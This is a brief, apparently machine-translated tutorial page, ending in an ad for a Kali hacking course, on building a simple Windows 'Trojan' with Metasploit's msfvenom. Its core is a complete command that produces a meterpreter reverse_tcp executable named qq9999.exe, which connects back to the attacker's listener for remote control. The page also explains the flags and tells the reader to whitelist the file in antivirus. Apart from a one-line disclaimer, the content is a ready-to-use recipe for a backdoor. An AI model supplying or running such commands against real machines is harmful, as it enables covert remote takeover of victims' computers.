laitimes

In just 3 steps, the simplest Trojan can be generated

1、Metasploit是什么

MSF is an open-source security exploit tool that integrates common spill vulnerabilities and popular shellcodes on various platforms and is constantly updated.

Metasploit simplifies the complex exploit process, making it easier for even users who are not familiar with computer security to exploit known vulnerabilities in software such as operating systems after a few hours of learning. It is worth noting, however, that this capability should only be used for legitimate security testing and research purposes.

In just 3 steps, the simplest Trojan can be generated

2. What is Msfvenom?

venom Chinese means: venom, toxin. As the name suggests, Msfvenom is a software used to generate backdoors, execute backdoors on the target machine, and listen locally.

Example: Simulating the generation of a Windows executable program backdoor (qq9999.exe)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.234.137 lport=9999 -f exe -o qq9999.exe           

The -p parameter is followed by the name of the payload you want to use. This is where you specify the type of payload you want to use, and it will open a connection back to your IP and port on the target machine, allowing you to control the machine.

The -f parameter is followed by the generated Trojan file type

The -o parameter specifies the output path and file name of the generated Trojan

In just 3 steps, the simplest Trojan can be generated

3. Copy to Windows, it is easy to be killed, and all the test software will be added to the trust zone

In just 3 steps, the simplest Trojan can be generated

Click on the link to learn synchronous video lessons!

Kali and Programming: KALI Hacker Network Security Course - NetEase Cloud Classroom